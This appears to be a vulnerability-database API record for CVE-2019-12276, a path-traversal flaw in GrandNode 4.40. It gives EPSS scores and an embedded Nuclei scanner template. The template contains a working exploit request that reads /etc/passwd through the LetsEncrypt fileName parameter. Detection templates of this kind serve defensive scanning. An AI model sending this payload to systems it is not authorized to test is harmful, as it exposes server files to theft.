{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-12276/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-12276/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-12276/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-12276/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-12276/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-12276"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-12276"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.57099,
      "kev": false,
      "percentile": 0.99027
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2019/CVE-2019-12276.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2019-12276\n\ninfo:\n  name: GrandNode 4.40 - Local File Inclusion\n  author: daffainfo\n  severity: high\n  description: |\n    GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the entire system.\n  remediation: |\n    A patch for this issue was made on 2019-05-30 in GrandNode 4.40.\n  reference:\n    - https://security401.com/grandnode-path-traversal/\n    - https://grandnode.com\n    - https://github.com/grandnode/grandnode\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-12276\n    - http://packetstormsecurity.com/files/153373/GrandNode-4.40-Path-Traversal-File-Download.html\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2019-12276\n    cwe-id: CWE-22\n    epss-score: 0.57099\n    epss-percentile: 0.99027\n    cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: grandnode\n    product: grandnode\n  tags: cve,cve2019,packetstorm,lfi,grandnode,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd\"\n\n    headers:\n      Connection: close\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022049d50aba2af3ae5e31abb4185a90c8facfd1c170200929eb5d7676025da6210402203fb487c290be9e05788a1ce2e35ce5ed59ccca14643b351740a1bff682155ffc:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2019-12276"
}